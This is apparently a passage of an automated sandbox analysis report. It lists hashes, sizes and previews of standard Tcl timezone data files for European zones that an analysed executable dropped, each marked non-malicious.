                                                                                                                                                                                                                              SHA-512:218674ECD9FD6C1A1C83EE69AFE6AA5AD0D5A8BB59FF497FDF2573B7CF52DAE98ECE0815CF99668CA4E172FF67D220B227369865076333B3EE802A8839C65279
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Europe/Chisinau) {.. {-9223372036854775808 6920 0 LMT}.. {-2840147720 6900 0 CMT}.. {-1637114100 6264 0 BMT}.. {-1213148664 7200 0 EET}.. {-1187056800 10800 1 EEST}.. {-1175479200 7200 0 EET}.. {-1159754400 10800 1 EEST}.. {-1144029600 7200 0 EET}.. {-1127700000 10800 1 EEST}.. {-1111975200 7200 0 EET}.. {-1096250400 10800 1 EEST}.. {-1080525600 7200 0 EET}.. {-1064800800 10800 1 EEST}.. {-1049076000 7200 0 EET}.. {-1033351200 10800 1 EEST}.. {-1017626400 7200 0 EET}.. {-1001901600 10800 1 EEST}.. {-986176800 7200 0 EET}.. {-970452000 10800 1 EEST}.. {-954727200 7200 0 EET}.. {-927165600 10800 1 EEST}.. {-898138800 7200 0 CET}.. {-857257200 3600 0 CET}.. {-844556400 7200 1 CEST}.. {-828226800 3600 0 CET}.. {-812502000 7200 1 CEST}.. {-800154000 10800 0 MSD}.. {354920400 14400 1 MSD}.. {370728000 10800 0 MSK}.. {386456400 14400 1 MSD}..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):185
                                                                                                                                                                                                                              Entropy (8bit):4.925156646979837
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqxV/y+YF3vXHAIgoq8yFRRL/yQagKVihh8Qahyuv:SlSWB9vsM3ymhVoPHAIgoh6N/yy87Fv
                                                                                                                                                                                                                              MD5:3AEDE4B340D0250D496C49CADBA04E62
                                                                                                                                                                                                                              SHA1:C466D8275C465752F5B024615268F6D1CBBA4B41
                                                                                                                                                                                                                              SHA-256:2B9A0F1775355E311FB63903E3829F98B5F6C73C08F1BECE1A2D471ACC2673E3
                                                                                                                                                                                                                              SHA-512:2B08B57D58699C65A9AAA43AC87F29DD1EDCBA9F91E79DF4B1E07832032F5B03A43847E20345484730E8D2323199E7439D8C1FC662E812E8BA6EE19C53C89681
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Europe/Berlin)]} {.. LoadTimeZoneFile Europe/Berlin..}..set TZData(:Europe/Copenhagen) $TZData(:Europe/Berlin)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):9810
                                                                                                                                                                                                                              Entropy (8bit):3.7678769652077873
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:192:sExxHZiMU8EKTy74jT56XdEN1+UZBdMN186LPR:sEzZiMUZ6y0jT5bZHMN186LPR
                                                                                                                                                                                                                              MD5:E1EB426EA3351AF0D7D563006F9146BC
                                                                                                                                                                                                                              SHA1:1E94F3B38366FE43BB031A57D19894B569EBABED
                                                                                                                                                                                                                              SHA-256:895957521D6CA4DE7E4089DC587A6C177B803D8ADF63303B1F85DEB279726324
                                                                                                                                                                                                                              SHA-512:8F24E9519F5D42F34AEE5C52A94CAC7D035EAE7B31DC3E629C29CFE3BD85F1510188290D35CD327492A030168443FED8BD80EC57ED27811B786C4DC89B4B1181
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Europe/Dublin) {.. {-9223372036854775808 -1521 0 LMT}.. {-2821649679 -1521 0 DMT}.. {-1691962479 2079 1 IST}.. {-1680471279 0 0 GMT}.. {-1664143200 3600 1 BST}.. {-1650146400 0 0 GMT}.. {-1633903200 3600 1 BST}.. {-1617487200 0 0 GMT}.. {-1601848800 3600 1 BST}.. {-1586037600 0 0 GMT}.. {-1570399200 3600 1 BST}.. {-1552168800 0 0 GMT}.. {-1538344800 3600 1 BST}.. {-1522533600 0 0 GMT}.. {-1517011200 0 0 IST}.. {-1507500000 3600 1 IST}.. {-1490565600 0 0 IST}.. {-1473631200 3600 1 IST}.. {-1460930400 0 0 IST}.. {-1442786400 3600 1 IST}.. {-1428876000 0 0 IST}.. {-1410732000 3600 1 IST}.. {-1396216800 0 0 IST}.. {-1379282400 3600 1 IST}.. {-1364767200 0 0 IST}.. {-1348437600 3600 1 IST}.. {-1333317600 0 0 IST}.. {-1315778400 3600 1 IST}.. {-1301263200 0 0 IST}.. {-1284328800 3600 1 IST}.. {-1269813600 0 0 IST}.. {-1253484000 3600 1 IST
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):9509
                                                                                                                                                                                                                              Entropy (8bit):3.8837074152297704
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:QTOKVA1oCobz0W4x2+ZE74elPiIEtzsFpMbFNBwA3ybuNTjrjBDmE0DmiTcoYdNA:QyoCvTZ641sFpM5vwA6Efv03TBZLl
                                                                                                                                                                                                                              MD5:D04F8EDDA1C3611692FB91E317CCADFE
                                                                                                                                                                                                                              SHA1:1C483FC95459EC6F1D5FE4DD275879A9EBCA1718
                                                                                                                                                                                                                              SHA-256:0524A31131405347C1D5D86C5EE38A2064AB055C030AB3B43F25DB3B28FFD8D2
                                                                                                                                                                                                                              SHA-512:4E2E18EBDE2765F2251B1FE41EF8E6AC79875617348974A28619F5E59EC0467239C682CCE8DEBD7A698BE2F00252C77D1F7FA50B6CAFF920B3BE53A0B836F815
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Europe/Gibraltar) {.. {-9223372036854775808 -1284 0 LMT}.. {-2821649916 0 0 GMT}.. {-1691964000 3600 1 BST}.. {-1680472800 0 0 GMT}.. {-1664143200 3600 1 BST}.. {-1650146400 0 0 GMT}.. {-1633903200 3600 1 BST}.. {-1617487200 0 0 GMT}.. {-1601848800 3600 1 BST}.. {-1586037600 0 0 GMT}.. {-1570399200 3600 1 BST}.. {-1552168800 0 0 GMT}.. {-1538344800 3600 1 BST}.. {-1522533600 0 0 GMT}.. {-1507500000 3600 1 BST}.. {-1490565600 0 0 GMT}.. {-1473631200 3600 1 BST}.. {-1460930400 0 0 GMT}.. {-1442786400 3600 1 BST}.. {-1428876000 0 0 GMT}.. {-1410732000 3600 1 BST}.. {-1396216800 0 0 GMT}.. {-1379282400 3600 1 BST}.. {-1364767200 0 0 GMT}.. {-1348437600 3600 1 BST}.. {-1333317600 0 0 GMT}.. {-1315778400 3600 1 BST}.. {-1301263200 0 0 GMT}.. {-1284328800 3600 1 BST}.. {-1269813600 0 0 GMT}.. {-1253484000 3600 1 BST}.. {-1238364000 0 0 GMT}
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):183
                                                                                                                                                                                                                              Entropy (8bit):4.879252060643389
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqxVxKL823vXHAIgoqyKL8H6RL/yQakQAL/yQavKL81n:SlSWB9vsM3ymvKA2PHAIgovKAH6N/yYU
                                                                                                                                                                                                                              MD5:07AF23DA01CB963EA9E57534E34E7704
                                                                                                                                                                                                                              SHA1:1C4A214FF3B722E80C0ECACA0FFD5DFF302F6AE9
                                                                                                                                                                                                                              SHA-256:F7046808A8E80B7AE449D1A49AE3E480096736B7D3F554A240C7DFB10F82076A
                                                                                                                                                                                                                              SHA-512:713860D340C0EBA5EEF873ECB9B28CCDE9BFAD31B6A8626EF507E96585F5CC1091BF8D8A2DB7E5CB532E44F4561FBAE1797141724EF934755B69919FEA09A78A
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Europe/London)]} {.. LoadTimeZoneFile Europe/London..}..set TZData(:Europe/Guernsey) $TZData(:Europe/London)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):7368
                                                                                                                                                                                                                              Entropy (8bit):3.7258352536809705
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:OsR0uO7DVopaNlKkUpvBeRF+iDlKSdkwSMTHkB2vwz59F06Kgr/y/rYjlBKb0hzj:OkyDjivBeRF+W35Syrwl9h5j
                                                                                                                                                                                                                              MD5:7FF902B06FA79F14553670A70E77FF8C
                                                                                                                                                                                                                              SHA1:0105051541F38956EA6192BD0C7ED4047668005E
                                                                                                                                                                                                                              SHA-256:5B5C0A9261A414EA8DC34F594EE05BEE16F695488B230857D2B569A6B603BC39
                                                                                                                                                                                                                              SHA-512:551940199783A0FF9D73695B77B10300644F50E91D6B02FE79BB0CD4B78C7BA88CCE56F4B9408EC146361BF408F52D01A1F435183360C801EA5E219FB718247F
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Europe/Helsinki) {.. {-9223372036854775808 5989 0 LMT}.. {-2890258789 5989 0 HMT}.. {-1535938789 7200 0 EET}.. {-875671200 10800 1 EEST}.. {-859773600 7200 0 EET}.. {354672000 10800 1 EEST}.. {370396800 7200 0 EET}.. {386121600 10800 1 EEST}.. {401846400 7200 0 EET}.. {410220000 7200 0 EET}.. {417574800 10800 1 EEST}.. {433299600 7200 0 EET}.. {449024400 10800 1 EEST}.. {465354000 7200 0 EET}.. {481078800 10800 1 EEST}.. {496803600 7200 0 EET}.. {512528400 10800 1 EEST}.. {528253200 7200 0 EET}.. {543978000 10800 1 EEST}.. {559702800 7200 0 EET}.. {575427600 10800 1 EEST}.. {591152400 7200 0 EET}.. {606877200 10800 1 EEST}.. {622602000 7200 0 EET}.. {638326800 10800 1 EEST}.. {654656400 7200 0 EET}.. {670381200 10800 1 EEST}.. {686106000 7200 0 EET}.. {701830800 10800 1 EEST}.. {717555600 7200 0 EET}.. {733280400 10800 1 EEST}.. {749
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):186
                                                                                                                                                                                                                              Entropy (8bit):4.914274131294981
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqxVxKL823vXHAIgoqyKL8H6RL/yQaqpfioxp8QavKLS:SlSWB9vsM3ymvKA2PHAIgovKAH6N/ycS
                                                                                                                                                                                                                              MD5:F9A0F19FAF3131D8A70C50FF21B365B7
                                                                                                                                                                                                                              SHA1:7FC2B5302FAD06BC4C633CD22A80A7D40073FFF8
                                                                                                                                                                                                                              SHA-256:2F1151B0528A5325443379D4E7CCE32C00213722AD9DF764E1DC90198084B076
                                                                                                                                                                                                                              SHA-512:6D04DF4480FE132A6641C4BF7E01936E2E4A71A3A6C2AB9F7DA7A9D8A4B836BC66EE2BB597B8C318D07A06F72C05B07E6785B53308ED9BC1103AE6DBDD0FF24E
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Europe/London)]} {.. LoadTimeZoneFile Europe/London..}..set TZData(:Europe/Isle_of_Man) $TZData(:Europe/London)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):3683
                                                                                                                                                                                                                              Entropy (8bit):3.814835316757376
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:Qi0p05zvSPBUUl0ZFzo4ay0CREDcxn6nH78BV0QbCgkCPviiM0H7hdli80+j7x9L:Qiq66OFEIFMssCfMsXV3heM2MRlA0
                                                                                                                                                                                                                              MD5:A8256656B971F58CB991BC270BF93B26
                                                                                                                                                                                                                              SHA1:189796E1B8E29A7A7B8B0E143DD9B44BAF217AB2
                                                                                                                                                                                                                              SHA-256:08061A80FC0F1EF375EEFE784EACDF0812E289FD67E8613BDEC36209985CA1D7
                                                                                                                                                                                                                              SHA-512:1F11308B5BAC1F3DB75CAC7322BBEA6E51C6B4A2A3450F1DB84DE6AA127F0F1BAA7DAB409FAF1288C100BDA77DA6FA1C6E3C0BA962F9406D1445D7C9E2AA3A60
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Europe/Istanbul) {.. {-9223372036854775808 6952 0 LMT}.. {-2840147752 7016 0 IMT}.. {-1869875816 7200 0 EET}.. {-1693706400 10800 1 EEST}.. {-1680490800 7200 0 EET}.. {-1570413600 10800 1 EEST}.. {-1552186800 7200 0 EET}.. {-1538359200 10800 1 EEST}.. {-1522551600 7200 0 EET}.. {-1507514400 10800 1 EEST}.. {-1490583600 7200 0 EET}.. {-1440208800 10800 1 EEST}.. {-1428030000 7200 0 EET}.. {-1409709600 10800 1 EEST}.. {-1396494000 7200 0 EET}.. {-931053600 10800 1 EEST}.. {-922676400 7200 0 EET}.. {-917834400 10800 1 EEST}.. {-892436400 7200 0 EET}.. {-875844000 10800 1 EEST}.. {-764737200 7200 0 EET}.. {-744343200 10800 1 EEST}.. {-733806000 7200 0 EET}.. {-716436000 10800 1 EEST}.. {-701924400 7200 0 EET}.. {-684986400 10800 1 EEST}.. {-670474800 7200 0 EET}.. {-654141600 10800 1 EEST}.. {-639025200 7200 0 EET}.. {-622087200 10800 1 EEST}.
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):181
                                                                                                                                                                                                                              Entropy (8bit):4.8801202136140915
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqxVxKL823vXHAIgoqyKL8H6RL/yQap6cEBx/yQavKLS:SlSWB9vsM3ymvKA2PHAIgovKAH6N/yzx
                                                                                                                                                                                                                              MD5:FE10770868A75F4F8D76C5E23D99AA81
                                                                                                                                                                                                                              SHA1:30AC768BA47AF7A53831F5142B58ECEC41933621
                                                                                                                                                                                                                              SHA-256:97EB33915ED7C9C34144F8F42357FAB2262B3CD45287F3CFFD26C33D65F7651E
                                                                                                                                                                                                                              SHA-512:1D82DF45AB0CCDFBFAD0431C668794996E01776800F34DD4131C5287D37291657A749D497AA5B0AB81CAFF3190896633FBFF456BFFEB7E93A3420AA841E54842
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Europe/London)]} {.. LoadTimeZoneFile Europe/London..}..set TZData(:Europe/Jersey) $TZData(:Europe/London)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):2512
                                                                                                                                                                                                                              Entropy (8bit):3.941165221943348
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:coNlj+X2uxhuHJkw0QqXknzaVV04v3TfdGY3kNmneVuNlh000sGpdh:coN9+1EpkwCXkSV3A8qc0
                                                                                                                                                                                                                              MD5:104CCB93300F40BAF8F4D7CC882EFC05
                                                                                                                                                                                                                              SHA1:EA83F3C3791BD6F083844939DC405B248E738FE3
                                                                                                                                                                                                                              SHA-256:2387D26DF5429DF9867F42F7D4F872DC146643B4B3CC57DA7298C18561DE8BFE
                                                                                                                                                                                                                              SHA-512:12724C5BBEE0835626A98B66BF55C3DF1311F07018C70D76FC5C50E7E7BA5C4A9F064D9EDC376CC3B06C4FFFECA3FAF5B66948615A03DFECA7C361E326D950EA
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Europe/Kaliningrad) {.. {-9223372036854775808 4920 0 LMT}.. {-2422056120 3600 0 CET}.. {-1693706400 7200 1 CEST}.. {-1680483600 3600 0 CET}.. {-1663455600 7200 1 CEST}.. {-1650150000 3600 0 CET}.. {-1632006000 7200 1 CEST}.. {-1618700400 3600 0 CET}.. {-938905200 7200 1 CEST}.. {-857257200 3600 0 CET}.. {-844556400 7200 1 CEST}.. {-828226800 3600 0 CET}.. {-812502000 7200 1 CEST}.. {-796777200 3600 0 CET}.. {-781052400 7200 1 CEST}.. {-780368400 7200 0 EET}.. {-778730400 10800 1 EEST}.. {-762663600 7200 0 EET}.. {-749095200 10800 0 MSD}.. {354920400 14400 1 MSD}.. {370728000 10800 0 MSK}.. {386456400 14400 1 MSD}.. {402264000 10800 0 MSK}.. {417992400 14400 1 MSD}.. {433800000 10800 0 MSK}.. {449614800 14400 1 MSD}.. {465346800 10800 0 MSK}.. {481071600 14400 1 MSD}.. {496796400 10800 0 MSK}.. {512521200 14400 1 MSD}.. {528246000 10800
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):173
                                                                                                                                                                                                                              Entropy (8bit):4.970386708540243
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqxV2cvXHAIgoq1csFARL/yQaoM2EBUQaocqn:SlSWB9vsM3ym5HAIgoiAN/yOEBUC
                                                                                                                                                                                                                              MD5:74ACF46A3248341CFD84B1592F884A8F
                                                                                                                                                                                                                              SHA1:888FBB54381A1B5BC19E65AF38A1913635A8E7E4
                                                                                                                                                                                                                              SHA-256:05C55F87182F0D5D3E8E6C1F9164EDDBDB8035146A0955C04283BC1347D45B30
                                                                                                                                                                                                                              SHA-512:21A752390E023CBD582BC43865D43458B44B036299A2373948269196071742ED7EB6067DD9A288F3A15E808B452FE4192750FAE813F70738FAB0C866219D57CB
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Europe/Kyiv)]} {.. LoadTimeZoneFile Europe/Kyiv..}..set TZData(:Europe/Kiev) $TZData(:Europe/Kyiv)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):2029
                                                                                                                                                                                                                              Entropy (8bit):3.668326642402654
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:FFvCAs6kKR6aQmF1cSNWrI+AjXgV/Ap40FjDM:FhCAs6kC6aZF1cSN4I+AjXgV/ApDFjDM
                                                                                                                                                                                                                              MD5:57BB199152815B12FE4491C92FE25186
                                                                                                                                                                                                                              SHA1:7BC5ECDE9EFADE812AF40CB92CCE5323FB57C78D
                                                                                                                                                                                                                              SHA-256:60884D4B8B17A9AB8FB5697DA95F62E570755348109C661D783D56CD047BBE9E
                                                                                                                                                                                                                              SHA-512:2043FDBA860E8F6578F7E26A80C7787B82C7D15188327923EC36D153FDF9BEEAE063012ACE4309B76DB9DBA2DFFB7404DE370BA85023CCE93159FCAD3B9B92B5
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Europe/Kirov) {.. {-9223372036854775808 11928 0 LMT}.. {-1593820800 10800 0 +03}.. {-1247540400 14400 0 +05}.. {354916800 18000 1 +05}.. {370724400 14400 0 +04}.. {386452800 18000 1 +05}.. {402260400 14400 0 +04}.. {417988800 18000 1 +05}.. {433796400 14400 0 +04}.. {449611200 18000 1 +05}.. {465343200 14400 0 +04}.. {481068000 18000 1 +05}.. {496792800 14400 0 +04}.. {512517600 18000 1 +05}.. {528242400 14400 0 +04}.. {543967200 18000 1 +05}.. {559692000 14400 0 +04}.. {575416800 18000 1 +05}.. {591141600 14400 0 +04}.. {606866400 10800 0 +04}.. {606870000 14400 1 +04}.. {622594800 10800 0 +03}.. {638319600 14400 1 +04}.. {654649200 10800 0 +03}.. {670374000 14400 0 +04}.. {701820000 10800 0 +04}.. {701823600 14400 1 +04}.. {717548400 10800 0 +03}.. {733273200 14400 1 +04}.. {748998000 10800 0 +03}.. {764722800 14400 1 +04}.. {78044
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):7455
                                                                                                                                                                                                                              Entropy (8bit):3.7624983280224953
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:vC1LyEpkv8V3MpaNlKkUpvBeRF+iDlKSdkwSMTHkB2vwz59F06Kgr/y/rYjlBKb4:vC9VW0bivBeRF+W35Syrwl9h5j
                                                                                                                                                                                                                              MD5:F37C7529B53C4C158341AF90F80C3A11
                                                                                                                                                                                                                              SHA1:210650A882350D35C72A934749F276C58C572DFA
                                                                                                                                                                                                                              SHA-256:591264F69DB19DDCDC90E704525E2D3D3984117B710F482F19DA8F88628EE6A7
                                                                                                                                                                                                                              SHA-512:F23B0C5251EB7418A1C80344AB7623D2A0197E681E3B7D152E416187BF66DE09A7A60A65F8ED6A810272CF0C253D63684F08AF594A8C22ABEA89E3BBADC8F0A0
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Europe/Kyiv) {.. {-9223372036854775808 7324 0 LMT}.. {-2840148124 7324 0 KMT}.. {-1441159324 7200 0 EET}.. {-1247536800 10800 0 MSK}.. {-892522800 3600 0 CET}.. {-857257200 3600 0 CET}.. {-844556400 7200 1 CEST}.. {-828226800 3600 0 CET}.. {-825382800 10800 0 MSD}.. {354920400 14400 1 MSD}.. {370728000 10800 0 MSK}.. {386456400 14400 1 MSD}.. {402264000 10800 0 MSK}.. {417992400 14400 1 MSD}.. {433800000 10800 0 MSK}.. {449614800 14400 1 MSD}.. {465346800 10800 0 MSK}.. {481071600 14400 1 MSD}.. {496796400 10800 0 MSK}.. {512521200 14400 1 MSD}.. {528246000 10800 0 MSK}.. {543970800 14400 1 MSD}.. {559695600 10800 0 MSK}.. {575420400 14400 1 MSD}.. {591145200 10800 0 MSK}.. {606870000 14400 1 MSD}.. {622594800 10800 0 MSK}.. {638319600 14400 1 MSD}.. {646786800 10800 1 EEST}.. {686102400 7200 0 EET}.. {701827200 10800 1 EEST}.. {7175
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):9878
                                                                                                                                                                                                                              Entropy (8bit):3.8275310275285723
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:192:j76abXsyZLEjx82YbtIaFF1w0us4qE3+sSGjT:j77bXsyZLEjx82atysLE3+sSGjT
                                                                                                                                                                                                                              MD5:0DA331C2A815739E6758797BD24554EA
                                                                                                                                                                                                                              SHA1:3829C441E908BEFDC4ED6AB65FD4ACD0C97D5E1B
                                                                                                                                                                                                                              SHA-256:9FAC9812411F88014779D34722F3E0D2750E45BF21595DF1AE14CB9CCFD3F33F
                                                                                                                                                                                                                              SHA-512:FEBBA05F64AC1F3066AF6351493DD89768154FD171D447503DAEDB90D16858BEDBCE4A74E24AC0C37B5FF191692AF44AADDE4A92E752F88C48DA646352AD9A0B
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Europe/Lisbon) {.. {-9223372036854775808 -2205 0 LMT}.. {-2713908195 -2205 0 LMT}.. {-1830384000 0 0 WET}.. {-1689555600 3600 1 WEST}.. {-1677801600 0 0 WET}.. {-1667437200 3600 1 WEST}.. {-1647738000 0 0 WET}.. {-1635814800 3600 1 WEST}.. {-1616202000 0 0 WET}.. {-1604365200 3600 1 WEST}.. {-1584666000 0 0 WET}.. {-1572742800 3600 1 WEST}.. {-1553043600 0 0 WET}.. {-1541206800 3600 1 WEST}.. {-1521507600 0 0 WET}.. {-1442451600 3600 1 WEST}.. {-1426813200 0 0 WET}.. {-1379293200 3600 1 WEST}.. {-1364778000 0 0 WET}.. {-1348448400 3600 1 WEST}.. {-1333328400 0 0 WET}.. {-1316394000 3600 1 WEST}.. {-1301274000 0 0 WET}.. {-1284339600 3600 1 WEST}.. {-1269824400 0 0 WET}.. {-1221440400 3600 1 WEST}.. {-1206925200 0 0 WET}.. {-1191200400 3600 1 WEST}.. {-1175475600 0 0 WET}.. {-1127696400 3600 1 WEST}.. {-1111971600 0 0 WET}.. {-1096851
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):190
                                                                                                                                                                                                                              Entropy (8bit):4.948438246006353
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqxV/sUE2tovXHAIgoq8sUE2oAovRL/yQavPSJ5Qahs0:SlSWB9vsM3ymhrE2tSHAIgohrE2LovNl
                                                                                                                                                                                                                              MD5:56C6C95484FEAF9BAF755683E7417B58
                                                                                                                                                                                                                              SHA1:A43176BEBC5B4D7144A7E1109E0AAEFD95C21EC6
                                                                                                                                                                                                                              SHA-256:713A842197516D618F2D86977262542A1CA334D7DF6026539FA2F2980DBF4CD3
                                                                                                                                                                                                                              SHA-512:566B6DF2D76A8A4D3405C4785C7A471A23D65CD8838831BD0DEDF5BF194E8A3B304CA9920CB4A8EC9D6CD60EAA9BE0335E38D9547A4D23C7E4E5E5A39A09DDAC
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Europe/Belgrade)]} {.. LoadTimeZoneFile Europe/Belgrade..}..set TZData(:Europe/Ljubljana) $TZData(:Europe/Belgrade)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):10211
                                                                                                                                                                                                                              Entropy (8bit):3.826887992237191
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:192:GNoCvTZtcf80KYiK3BG0Myj9TYQOeMAwbccM0Fp:GNNTZtcf15iOBG08eNwbccM0Fp
                                                                                                                                                                                                                              MD5:0625C99E16D3C956DED1C0C0F867DEC3
                                                                                                                                                                                                                              SHA1:6ACDF0DB619B63E21EC89046B9320A85FBD3397A
                                                                                                                                                                                                                              SHA-256:D04C4E25DF4DE1C1CFE1EF84B3B6DD746CF08A271AB0958F22C7D580A3ED10E6
